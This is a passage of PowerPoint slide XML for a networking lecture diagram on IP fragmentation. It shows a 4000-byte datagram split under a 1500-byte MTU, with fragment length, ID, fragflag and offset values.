            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23582" name="Rectangle 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3048" y="1212"/>
                <a:ext cx="2634" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23583" name="Rectangle 32"/>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p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23584" name="Text Box 33"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="1208"/>
                <a:ext cx="242"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ID</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=x</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23585" name="Text Box 34"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4662" y="1220"/>
                <a:ext cx="440"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offset</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=185</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23586" name="Text Box 35"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4028" y="1220"/>
                <a:ext cx="574"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fragflag</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23587" name="Text Box 36"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3250" y="1208"/>
                <a:ext cx="497"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length</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=1500</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23588" name="Line 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3246" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23589" name="Line 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3750" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23590" name="Line 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4020" y="1254"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23591" name="Line 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4638" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23592" name="Line 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5112" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23593" name="Rectangle 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5232" y="1212"/>
                <a:ext cx="138" cy="378"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23566" name="Group 43"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1560" y="3074"/>
              <a:ext cx="2676" cy="407"/>
              <a:chOff x="3006" y="1208"/>
              <a:chExt cx="2676" cy="407"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23570" name="Rectangle 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3048" y="1212"/>
                <a:ext cx="2634" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23571" name="Rectangle 45"/>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p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23572" name="Text Box 46"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="1208"/>
                <a:ext cx="242"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ID</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=x</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23573" name="Text Box 47"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4662" y="1220"/>
                <a:ext cx="440"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offset</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=370</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23574" name="Text Box 48"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4028" y="1220"/>
                <a:ext cx="574"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fragflag</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23575" name="Text Box 49"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3250" y="1208"/>
                <a:ext cx="497"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length</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2600">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=1040</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23576" name="Line 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3246" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23577" name="Line 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3750" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23578" name="Line 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4020" y="1254"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23579" name="Line 53"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4638" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23580" name="Line 54"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5112" y="1242"/>
                <a:ext cx="0" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23581" name="Rectangle 55"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5232" y="1212"/>
                <a:ext cx="138" cy="378"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23567" name="Line 57"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1290" y="2766"/>
              <a:ext cx="228" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23568" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="2772"/>
              <a:ext cx="210" cy="498"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23569" name="Text Box 59"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1387" y="1485"/>
              <a:ext cx="2035" cy="395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2600">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>One large datagram becomes</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2600">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>several smaller datagrams</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 60"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="471488" y="2562225"/>
            <a:ext cx="4025900" cy="2387600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="487363" indent="-487363" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="487363" indent="-487363" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buChar char="r"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4000 byte datagram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="487363" indent="-487363" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buChar char="r"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MTU = 1500 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="487363" indent="-487363" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buChar char="r"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23558" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="739775" y="5341938"/>
            <a:ext cx="2246313" cy="931862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1480 bytes in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23559" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2967038" y="5108575"/>
            <a:ext cx="3608387" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23560" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
